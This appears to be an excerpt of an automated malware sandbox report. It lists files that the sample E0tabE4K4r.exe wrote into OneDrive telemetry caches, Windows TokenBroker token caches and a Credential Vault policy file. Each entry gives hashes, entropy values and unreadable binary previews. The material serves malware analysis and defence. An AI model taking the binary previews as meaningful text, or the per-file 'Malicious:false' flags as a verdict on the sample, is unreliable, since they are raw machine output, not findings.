                                                                                                                                                  Preview:1.0./`.1...g:.+sc....ji...T\...u.k.~.tl..T<.....-...~r........hX .......%U...C@ .K....NO.\.=...iK.K.f.hc.}.,"\...z.......N....m..@)..Eu.mX...9.>...|).L\.....Y...at..[.s..0....2.?1.wI.K. y..@t.b....[a)z.65...h..Y..N.....4.I.x;5m......#..@#.R...X.A.a...P<.f..d..m=. ..Q...$.o....."d...`.a.N....h....WaIN..]_.`..khb.....D.. ....}._3...t9...n.'........N...!.<....b....4.....p...9j.#e...]....z:.).%f...E.%........./..p......*.(....h..J.(b%..y...Um.O.c..k..9xU.0k?.6..="i.+.....!T.J.T....Z.J..(o......d..w?..k(8...y...."......"=.N3.E..n....=w3...d[h.......s.<...?\..oj.N...2.D...cF>m.3.......C.^.Q.x?.B..k..g....}.N`5<]....Rh..r.e..8..}......U..0.n.<....pP......"aNl..[..jY.&x.Z.N.b..[._1....i...........e.~..<.GB...`.9)....lRJT...x7.k.8y*#........hX}B.qRF..G.5..Yr....#........z.I.,tq.M..n...._...|....F..gPV..1....'..>.0..`;.I.mq......./Z.....~j.....ZA{.?II."@D.)X)/..^.Q....'.......y....].l....G...kX6......X[,......G.&......J..........}r..S9}.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\machineTelemetryCache.otc.session

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):3.425321061161815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:WmsiqHYlQxhm9/emHLcWXciN5IsFcO01GBQwFPhztqQW:zsdHYeiDuSJ7zgZ
                                                                                                                                                  MD5:76A0674F044D03874510F1ED771465D1
                                                                                                                                                  SHA1:B4FACF4678FAC40693C4E317636D161A8A460180
                                                                                                                                                  SHA-256:85418268289BD042526C2E641C74638B3088B4E646A6E65F402C7A74D8AB2FB0
                                                                                                                                                  SHA-512:8493736511D119C45B4125DD85CE9D8565586F29DA848E90FDC6187C78B14028741858F5E70383E39F22A5F7839FD54CF270A649DDA2911E73C860CBEC4B137A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLit.qv...p.....{BpE.UM........+.x.1......c..5s..!....^/..Dm.f5R.$b..L..Uq..V]..y.&........S....|1.W=........B..TM..p..:..U.e/...8...<..L.j.K_q%..x>!........X...d.g.hhN..F.....x......kh...l.vb..OU~.f.<.R.+\:.=.x".W_&:...;...@6.e.4.u...6.-F.v.VR/.J.[..E.B..c.T...D...;O4<\.+!...].y...+81..q.L.........A...I......*.....T.h...d8.....}./....g..>.9.<.`a...KW..V...E6...mA|..n...tK.3...VKt..yW4w/.5...\=....0.....ac..h!{..B...y...T.H...m..DyMaA...t',.$./[....OHX..a.I.=..q-..?.T.....U0k;$.WB..s..A......@....%.3...2.f[U.&..Y.E..-!#...9.;.n..|.}.2......U.`......r.J.E.....Z.v...'<...t...9.*.H\.t..M}...cT..V.:.y~/.a..C..]....!....pZ@.}..}.......cC..s.Z..50.A.I.4.......jAT...\......v. ZFq5g2\t(..CW......dT.....y.-.y]...G.8"...>X.....&..[tT......4....V..~.Pj.M......a.\o...XW{M.#..>....W..R...W.....P..p-..?..r.,V{s.....k.Y<..mj>Ct..;..f.A.pq..].brN...`.%.....4!(.K._q'a.zB}..?.7........e..0....Y{h.....c8..r...iL....h...X...'.s'...W......XH..9......L*a.[3r.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):3.4289332359322366
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:UH313rF8Hb/DnEOCbz6udZ414WpDhWxUqj1y63K2LxFIk9:c3hJ8jYOxT14WpQ9jZ9LxFV
                                                                                                                                                  MD5:D825DEBD8F82B8F376059553DF083D20
                                                                                                                                                  SHA1:F34513CC775007658446DE78227250605E1BCDC2
                                                                                                                                                  SHA-256:8A55E60ABF023E305E75BCABBE00CD26B38AFC150D8CE04094210A69ACAAF443
                                                                                                                                                  SHA-512:86BADEFF6900E2241BE01964AED41A6D11285A03DA1FD89C9753AF70709563398F3C31DCEF029668A5387DDFF30F27AC2114486D260176079A1EB11C6D2F46FE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLit............q....T.<..}..O..E!...,y..y..&...s#j.2."q.A...9k.A..+V.p ....@..!F..5..b. .i....[......X.........x...\.B.....U...G..j...!.i...g..W.u..g.[.r...7.t...C.~.F.......w.x.Z;...@vpf...$\..X.?.e.....j.s6......z.. ...N4..cx..Or."P....j..".<.S..K.).V..ql8\O.&.......^....ki..!...#:.HT......Aj.......'..Q..z...</+.M7..?D.m.Z..c..<G..I.D^|..V....]./.T%......F....H..P;..s../.....J[tn.3..V....%;..Y........3...S...Nf.7.........*.. .1..a.'..H......ch......EZ..(.v.X..4.....?.q.. \.;,..M\.hp^%.,....:.L...mh.X......]y.-.......w.O....GR.S.0.!...<)I0...$..F.<.O.?..X......?k}GQ....t.9....1....2.u.'.`5`...AAc`t)..p....u.k}[g..!u.0[B|..r...|.z...........ju.o.....H....t._;...SR...^.m.j...Y0......x.(..#....0m...%b.?.qLkPc.y......N.N^........(..d....=.F.....!..jB*`UR.m..k=j{..j..a..l...'..g..`....N?..j.=..|....8......M.L&..,{,.Xb+.C.sJ:W;t.~_....<..o._.i..20...M).M_...:X?...A..ZZ.....,p..{.I=...n.YX...5HL7....qI.\..EM:...c..n.D.l<..p.6.*I+,..Z.._..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):3.426793301337098
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:KXlQG7quDIl9ErTnK2xTLrveHcmmEvcIE8eCjEulqxfId:Z8I/y5rGHcJEUIDnjD4xfId
                                                                                                                                                  MD5:578D1975A3960A5DD01039684167FE36
                                                                                                                                                  SHA1:EFE5DA91EFCA47F2D185F6186B230E96D359C609
                                                                                                                                                  SHA-256:CBF2780C13105BFED884101428C895668D9C27D812496542CD65F7D9AD7D8135
                                                                                                                                                  SHA-512:AE10CFDE66EC76268BA06B1FA1C7AE739ACC44BAFBC63811D99E65252697C3D4B58BC5A3A958988348E043509803EBAE3F25BF6F5660739BCC83D3C7A28D6A7C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLit...mL.Jl.X..p4..2.~....).UA.P...]H.@..r.s.....,1.m:T8..sjV...Kv.x./W.X....:l.+...}.".V.7-.."8EB....91.>c&r..:`...\...5..T..[.cxA..Q.!.?F..1.NA~..\..J...&..[..!}....n..I..g..;..S\.W.E...U.y..)$,k..cR..sef.1w.Nb......3=-..v.g.A.$.u..].R..s....k+B&JJf.Y....U.Js.....R.'1X..%..m..]...YVg...x..u9z...pGM/.zO...w..6..;.I........b..U......'..U..z.(6.#.B.w*...;...DG.....d..iK..@G...u4...<...M.@.#.9.a..P.}..g..D.H.I..o.A..Q..).s.].V......Lm))..+.....wB^...2W...I=...=..IO(....Gl......kJ...fC..Q.l.f.....~.H...:....F....B..l...Kt.UpA...1...+d..D....d....s..HG.by.8....uj..y....u.wg..3.m.["./..q..+.t-....n-.U..A.F7.1....FE.+.p....<...#./;..'-7.....aG.N.?[..Gt.+........2|.Hx...f.?......V....?.....'.7q.5F0bv...6...5...>.Y]....!.N:.......U.]KL.....O."..7..Pfh../y....rF.ki.2......Y....Z:B..M.35.(..=&...{..F........Am....){.-{wPm..9.q5..^...d.<.N......z.B'..Q .T...............mB.|;m......q=.X.m...K..-....\t.#..Xi.....VH..o<;..UN..d.f.\....E...~B...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1356
                                                                                                                                                  Entropy (8bit):7.811864908425626
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:YOAkbSi3UmUUnYIxZIi5xRu7WGMXPizUva185SHVv5uEo9DOhe4z+CSA2bD:Y5yUmxY8lxc7uUUy1cSHV9FhZKCED
                                                                                                                                                  MD5:4DCD2645214F59E7136DCD430691487D
                                                                                                                                                  SHA1:E2FC1ED92D0B389B990E783EDFD4353B8BADBCFE
                                                                                                                                                  SHA-256:EE738A9603A0C9B01DED1CA2C4C1F0356D551C71C57EB6E58C60949578ED5681
                                                                                                                                                  SHA-512:D0EDF5FE1267FEE23C1105E1C6DD429663B9CA269C207092DA8E8DD059FCD6D1AA5DDB95E5E91743E71774C7F6EEEE362AEE82FF3BC1C81182381169E4FB399B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"Rec.......|K.....V.....F..H{q.gaO.?%@.."T..yG.i+q..U/Q...#2..f.6.....=.J4.._....1 ./.H.O.....j.."el..E.<...X...@.......s....c%.. m..8..Su...*......!.Q.}c.We..>..O. .-d...L...=.4.@N^.1...%5....+..G.A'....6..^.......-.Y.B.9CZ....H7E....!!...u>.....$.^Z...v......Pm.:.6Znjm.k..v.,.Jl].....e.".J].mTK.V......C.f.\..%..Wq.b@......O\NZ...~.C..aQ..A....D.H'.H..5U..9A.l...E'.m....X.".....ZL..N2.!..'/=H.JZ.r......,|..*...B....H... .L..N,.V/P.2..O........q..}......T........]..o.;oI'[..V..F.M.WU......[..kp.W...h.....J..^...s.\2.*CP...1.....a.y...F...`...-../.....E....y.x..M...h.l...k...@.....qB.Z.dCp.u.4.....7.{..z.5.`../......H.]2.E..'.BL.y.....4.G..N........_R..9.E.a.8.-'..y.t.X.Q.c8.*.......gT.._2.qB.96.0.J...7..K..2S...TK..S..!.a.q^`^.e..\...4\M"m..Ie.......l...#..3,sz2...mk.....1....p+kmQ..r..{.l.......u-.... z.]..8.a.`..Ll0....'.).......H-.>..f.w,^O..|..0..,.......8......GnwHB.....&..'.Lg.m.qXO)K-.1...sM.KXo....e...U.99]..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.9212126833238905
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:KZHoCBXiOQp3glpYuu0svDN6UtJpvvB0TnM+GK3Jv2PPPXWEnuSitAD:uHoC5inpQlGuu0sB685vBqMC3KPPXpnH
                                                                                                                                                  MD5:A9CF0AD454FCC9F01A7AACFA24669AE1
                                                                                                                                                  SHA1:2F2BE48768759DDBDF6844BFFEDE5D70E044A27A
                                                                                                                                                  SHA-256:04B2B0F725B337FAD8A281773EB7AAC7A2775DCE0079E057EF80D0ABE95E39A8
                                                                                                                                                  SHA-512:6BBCDC2A62A01D591F274277F46F78B4BA7B5603F947BA7C331BCB4340D29B41513CA696AE277B6F0CBAA8A490E08AD5744A0E537056303B1BC06282864837E4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T.|N".r^F9q.M..._.b5......Y|BIq1.....A.L. s:.....-...>/..;......0%...4..Z.*{.....k.iK..]....DF.V.N..vm.v\\Vw*.2^.jQ..z........@......:u/.Q..F}.z?..-.Oy.C..$0SP.w.4If..b..A...#~.~......*..2.B+.V.?.....x....I.K.&..}.R...[N.......f-...s..I.}.....v,0+..&/.;(`!.y....,...i2.O.@.>..$D).....z.$~&.i.{...B.....=#...oH..,...{"..........~.?.7..)..&.~.h.....yF...B.........)....O.,.=.....#.TZ.....^Mq.V..].7|..l....2.(.n'....Izy...f(>.d..T.i.o..X.k.1ou...\./..$iLw./.J..<Rdf-Y>.i.5..YP._.>.u..=...Z.>.I..x<.O_t....y...W.r..-.p\hp]..d&.m..$j.u..........0D.....o1aZ..kU.},.a.J.f.zEI..i..i.2......f..l..R.r..J.o=.Du..}.......#.(.o..UJ.....B...=.J.;..o3^~b.xk...x.!f.n......x.E=0.$....?.LS...:...s...5...3bJAZ..D.M..3_.7>iY6B..F.'..w#..ic...(..o9./.F....f+.$.o..E$..-....p...%9.|Dp(.b1/`..t.[..J3=..*.zX......]^..S...0...5......V...............fX0l.i.I.@...b.l........{R..T..=..^....W.:..OO....p.w..(s.-....!....}......H>............x..R...Q..Cp.H.$L.ar.....34>...E/.!.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.937432464521145
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/b5yha1gEHhzSTe/Qp5Bzs2jBSASUFpqOssmq2rFcisi4T7NfQsVAD:/doE1SXzjY3UFtssQrFzAosVc
                                                                                                                                                  MD5:8EE0AF5FD4FE77DFC8CECB3C7BAB1957
                                                                                                                                                  SHA1:97DA61CB8205D88C3DF7642836359DAD013E96AD
                                                                                                                                                  SHA-256:661CBCEA8159268C0FCC23E58E94D0CBE76BDE43DE093407805A2EB25EA01CEE
                                                                                                                                                  SHA-512:F532519BF5A734EA9D0B09E599DAAC14668EB0E3FFA817560E2F45FE5D7895EE537CFCA4590A5FF7991EDDE416E28A2F32821477B7717A4728134A15123FC2BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T......A.....I.Kn.v...l...L{.ZX43..~R..&+g.x6.B...6.V...6p......xK....gxA.1.....EDU.l$.V...5.Z.|K]..k!#Q...y .....~.RM(..]aa@....;..D.y<.r>....>.8..H.cK..D.1R....0..xM$.&.N..Q...u..v..5...}..`X.K.e6Jq.~.E..vq.e.....U...];..!...n...<...c#..`\.``NB..$`.k.V..m.......!.ME.S..)...H..Yq...`...!...1S>...D..U0.>..PWmm...d...:...7.........8..h."..F.t..U0.`z~..._b.....u..3OFZ.i.ff...*fG;Vz...s.........M..Pdh2.g..5uIX..X.yL.s._...WU3...P.+#u.....-4.Qv.....h........\....%1|..p5....D.(..B........?...(sY3Y]..Ur.=...a^..%..7..S...O.9.V.\wa.14....%$........-.iV...rT....k*T..4..z..e1...2.o ....:1.X....s...B}t....X..S`<..(.{..8......}~.0..Y@r.......yQ..Gwf.=n....\.>.Y.."..k.IV.O...N3z...=.y?......]~.Pn...*vw...[C.rd..g.`.d+.R....:...6".v.%.....n...P$.....J...?..z.9I......P..{.^......I...W..0..s.Y.....p...J.+%ev...L.......4j.l..V...p....q).C.'{8.s..;c....V~...f9].-./.^......(.1..p.&.........P...q..Ob.q..Z.....=.8F....Pk...M.@_ev.6..(.&....H...Y.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3018
                                                                                                                                                  Entropy (8bit):7.934328193252267
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:EFGpxiB80QDtP3BrYCctA31XcqlBwV1eoUYift0sqaOv3Fqgk3ENUIfMvhk2roDH:8GLiW0QRfZYBt+1rwVwlYifmPdfG2DkI
                                                                                                                                                  MD5:9D6CD382272ABBE9181429D6C48D8CA0
                                                                                                                                                  SHA1:44E1B9D9698A6ECCE9AED2EE54C6CF1C49B3ABBB
                                                                                                                                                  SHA-256:BEF57C69C391CBCECF6FD1D3849A9DBB11EFDF70459AA5A76C9A626239785C1A
                                                                                                                                                  SHA-512:9B6CAAEF57E6A069D459A93B4BA4CBA5AA9DC931CDA31AE9109F9E57DEF9F7326A2454BB8CB73BDB735F577CB098776958BC3FC82909B8A8ED77496E2A8BE253
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".TC....|..C6..8..k]......a.Y.z.S....ow.%.V.N,h....v.#.Cd..Hm.,c...-./.l......L..x....e7...T..g.-.N.......1.Ni.Mu..5.r H.Z...<..@...h.....\bbxqe.._Q.....IMg..w..=;q.}3..3.(\...c.`K&~..>...l....|OA..t..|Y.u...Gn..F...a.tI...7R..G>HNd........."w&`..;.L.k.V.....*.OD.d'.W.E.....v.1..z\\..#....!Y........U.t..*....n.$;.>.97.VO.so...C..].b..c.#..G.....%.*..X+P.."IX..-V.z.....*....~......l.0...o..!Jk.}9.}..?.f.....}.".\.B..6...F.H.I...D......Uy...:.X....w..gXmP......"0.a...`.MY.W.GZ[.[..y.(WH..LI..?..B..].......rQ...U..$......R.h`).j..|...J..........(~|o..Q0}./....................\.......t0.O.w..,.s..zA......p..M<.h:d...S.QtX.N...$.n.`...f0.......P.9.......L.].>.Wn...V......{wy<.....R....@x.I.B...w...l./oq......R..u.u.yo.,...q~...9..h(b..(..U&.j...`.L..-..'L.(....}..b..7O.F..,......O....!M.......{...8..A..;......J$m....MO...\.H.3.V....%sb..*6x....p...I.h.q....M......d.Y.td...#.~a.]Fs.......L..b.0F....M..+.V5.t..'1..[#0....f.U......'.S..3ky..j.D!...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.921144084658078
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:maEEeWB4jbaElyxX2Xmp/E4OlTg7v2XMMhqr8IeTNtmHBNHoGxr677AchRDQgqhl:vjXB4aEl7Wp/E4OcANIeTNtctoGx8Acm
                                                                                                                                                  MD5:FDE296D3ADBBD4B574E4397CA0A7198D
                                                                                                                                                  SHA1:A6B2111878197663F979F1B5358DFF8C9D067560
                                                                                                                                                  SHA-256:5A654FA15D719DABD5CE031C20A59F28A98A364EFAD9490573407DFDA18F8A2C
                                                                                                                                                  SHA-512:05158B1319665F6EFEC814DB7608C8F1966CE13817E1F5A65B11F6C8F03CF03FFC2A0A944400B442E06327866041E2DAC3E0CE43C5A6B60B9B4E56303121C596
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".TU..o+.9..4....,..........zds..u`=...i..).."....|.....d.rA.A.U&(MG3.f...gr.NTP.S.....0.....Z.5H....A..gU..Q=V....Pw<..X...*.T...}..........6.t.g.D....59.qF..M...J.+.M.....X..OZM..).J...Yg..A/.....As....1..D..<.7.K....~M.b...~?Y):.J.}-iF.b.c..q o....q._.nuU..Tc....$~...>/..{...@....|K.!G.n.3..t...<...x..M...#..Jv...U..:\h.h..HN.&.k..&.=g..@.7.0M[L..a@.....K.\@..I.9......z..<.H..{.U...2..r[`.... ..R0q..LH...z.....x.D.....i.,.*oU....C....N.0.n...I.J..8..../.(.0.I....UQD..!.7..Y.iq..Pt.'..X..*....O.....r..y.c..An|-.s..8<.. MS..^...z.Y.....x.<...t.(n.....D.....R...6.L.w*.R.M.>.FC._b&.....9.......Yb~..3..(+uu6. .:..-...|..<...~(......'.A. ....bw...!.%......e....iq..$X..(.I...A..7[..4.........N.g..L..I..,......i....1~\i.b.=.g6..%.QJx6.>.G...4$r..!......p.Q.:*..[y;.g...hM[v.BW.........Z.t.u."Rr.... 9.KO.|o.....N....7.K.|..zfT..j{..S.HC.......9.9...(!c........f.F.c4...w....@......7).I.4.. ....,..c.y.......l....}..q..X{.}w.....2.~..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4956
                                                                                                                                                  Entropy (8bit):7.963379825724958
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:u20HWxN38knb0b+rVRI9/9MEjDz6+9OhJA9To26KxKNGrli6MmGw/kCuhtUnD:rB8k4yVRI9/9MJ+qFuKF6zZsCysD
                                                                                                                                                  MD5:58E2AE83E86D19027EC3FE5915352793
                                                                                                                                                  SHA1:30A5F790F776FB0E0B3E7E1540D978198F332D70
                                                                                                                                                  SHA-256:B9670BF01DF80BFCD21752AC1980A901473CE9E442B5A03ED29839DA945C4EC3
                                                                                                                                                  SHA-512:B55B9953E12F6A1FE6C0268739D49AF9CD3C8E2077618208C5D0017BEE3336150F0D0E4827817D5001DCE83534308259D1F1A35C126B231EB022AF2EDCD2173E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T....1........@C.c.....e}op.=..`....=O0fP.[.#m).O........6T..H/..M..F_...........SY..9.-....K.Xp.s...Y$.<.u8..z.l.3.^f.L.^.S....-..B.MD...j....F..;O...{.|..m.....YXJ.I...^i7....O.B.%D...r....T.*.QJ*.}..&M..@JJ..z.B!..Q..RI..2)s..^g.....dW=c..6...1....)<k...oVl`<Y.G..OC.....I...j..t..\..9aV.Q..?..B..YO{.H..cO.A....k...#2...'......y"|.q{.>.[.<.F.nW.O..O.b...[l..fMO3......]...... .g.L..|.)T..=.J._.6}..x...1.B...<$D..+.L...!.d.....f.}.W..w..._..e....b.PQ...F...>.`....N.fH..xD.,.8....,..Ez....i.R.C....2.NKcp...Js.Cs.#:.......E._...h.[..x..W..7.0......^G.P._.).c&%3`.LD....2.\.4....G.[...sg...4W\..rk..7..0....c........H.>$.........#.9..a.///....b.Z..u.A..y.H\J.....K.F......1...rs..4..{...+.!G+..nn..O'7.&]......e}..<E...C.).0...x....q.S...a:.dl....>4....h,.....).9..M3.-^+.&0h....d".N3..2...R%..-=...".x.d..At/Tmz..h......bD.0.....w...n.Ez.......[.....$/........[G..T..2......O...........c..R5.N..:...'n..(;...Y..{z....I;.."|..4....{-..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3018
                                                                                                                                                  Entropy (8bit):7.937432171409745
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:s+nlHc7YhkdR9JgdDTXCUQ98wMkrX7LKdHsB+K0cBgi9WMv3/O6udfiRjDsVtu3O:Pa7Tr98TWX7mtsB/0B2262fiWHuEQcbh
                                                                                                                                                  MD5:BD4445F38E0A6EEB04B39EFF202AD56F
                                                                                                                                                  SHA1:4A04452296B354472DAFD64358CB07FA7F672E59
                                                                                                                                                  SHA-256:155DAA9ACF5D06723742944E3EBC562B71173333B01367CFCF2204C74A1AA9BC
                                                                                                                                                  SHA-512:B52D28753ED90BCC1E9471353D7E4C9DA99600E68093AB5836690E14DAA89AB42AECCD7F6F1C098AE42673DE2835C49BC76E3EE01EAEFEFA8374CC62C53FA075
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T...DXB(.#F....,(.s..V..e.Hq.G."B.7...&..Q.::....JU.W.4a.S@.|.....@.io'..@....^H.].....yH0%8....K.b.....t..q@...&N.PN./.3P6...U+.b.v.!..w.w.a&.W.(....8:{.<..w..8........o....a........,..p9.-rC..}n6y"...?....g.....;Q.D5R.{...6.}...b4t..Y+..3..(d.1.....{A.%..;....K..t!..}s....,......n...S.../A....PF.y.E.^kCd^w'.#...o....`dPe/.Q.DNRS.G...!..I5.+.\. |.;%&h@8n.kL....;...?d.F......us......S.B.gkC0...4,d.......cK....O..+..._@|.......!..&6pu".......,O..G....&.v.,`..,...Sr..g........U.T..=sI.\..bv.C...,r7.@z~A.3..A..b..UE.1..A..^..........o.cI.r.........*.Ya;.l.=..E.#+..._<.+yN....g..n..J..;..H..m..>.....th.>.....+...;C.Ldm.).....a.R..R2....-Jz.>.#0Q..../..1r....R$Zp5.>.$...g..=K.!sx..W...~.x.&..H.....q..c".E.b.~..~.[B..2!......2....Q...,..27[.h?.$\>DJ...`.. OI.Z!7.X.fv......c..h..:..C...O.....Cth.g}..u...9..v8*.......0....p.f.......+..`eY.L...MN{...vz.....82.....Y.:p.a.x..<.|.#'.t|.c%..b..#|.>.=x..V.._....a.+.}ns...]w-.i.Tv.@.e.-...?..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.932970084379917
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:RjMsUmcrpW0I3On2lvJ16cPd2tl++/2dL+LD:GtmcrhI+2lbPPdsl+Acy
                                                                                                                                                  MD5:D841F36C3A529D0C91A247E33CB1F63F
                                                                                                                                                  SHA1:BF3725AE8EBD1D84C063BD3C4A07FF92533D66FE
                                                                                                                                                  SHA-256:6D40AB8DB9F54055B3A361C1DD961EC526AE0A559B76399A02F128A5112771AF
                                                                                                                                                  SHA-512:E51C24AB041084A02EBC851A2694788C949DDD961715CF67FE7DEF3071EFB1541EA5DBD4515C7AC7087088B8C9C5B4801064A89EF4A5700062030F2C28354B71
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T.J.N...6F.>..:...F&.O.....x........J.E.%t......)&...\]"w.....u.i|..@-b.9.(A#).DkX.|cNN.R:...~\[..O.c..5.SYQ.n..........z.....4....._x.}......g.)w.ba.......H..dL.......Y...J..AC..B..u.....S..G"u/._0rKFn^....a..iX...p...Q....GM....@).........?.).Pk.....=h..6.|iJ.&#.....1..$.40.ksixi_x?k...x!<.E...N`..........Nly..... .~...W......).?sc/C[*\pFrJ......x.c.A.;.....F.....M..{~...zr.4|.....C.0.....].@@..c.._z...5.1...?m....r../..P....pZ. ..J....N!.l'}..K1j9.Z..#........>H.xP...A...)Mw.......&..W...}.......y.+.v..sJQ.=z.2:U...O....f|....:......z..DS.a=O.a.T.D...8o.....zM....zu'...}.....omn.Q....p..1..w.....'t~!.._....;.........>+..N_(.;.......~....3b.. #.?.QA.....lwn.'V65l'.a...n.TM...]...k7...4.'.\.....Z.i.....%.........Z.5.:.{.}...*..]f..................-P.,AB.....M.XDEiZ{p...p....X.5.......y.0..$..=H.T)...+.K=6.2.p..w.......k..%q.=`...,Ip..J....a^....p.2...h;....!.b..$8+.[V.gsy..dvj..9.Q0#..h.w_.C)Y..[*.K...~.\.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):770
                                                                                                                                                  Entropy (8bit):7.7440740996313755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:/w2PHouDtieP6pMkU+ICZLlqp5NZEN9S/j7OlG22bD:/w2PHo+tieCpHICZwZENU/fOlyD
                                                                                                                                                  MD5:988872E400D81B59F50607D1C2E0E561
                                                                                                                                                  SHA1:FE6511EFCD8FEC11602E636BE95AECB8561ECCF8
                                                                                                                                                  SHA-256:A63714051F00D427F5DCF671F533C31BF7EC40BB57B097069CD2015B8B6F183E
                                                                                                                                                  SHA-512:D4032225AB29461405246CDA9FB9BCC453092E04CA9774958954AA20701EA4025DF5B9333E1C7FBD343A5F9537BA3BFCE2D7268249FC238626C1ECA1642D15CD
                                                                                                                                                  Malicious:false
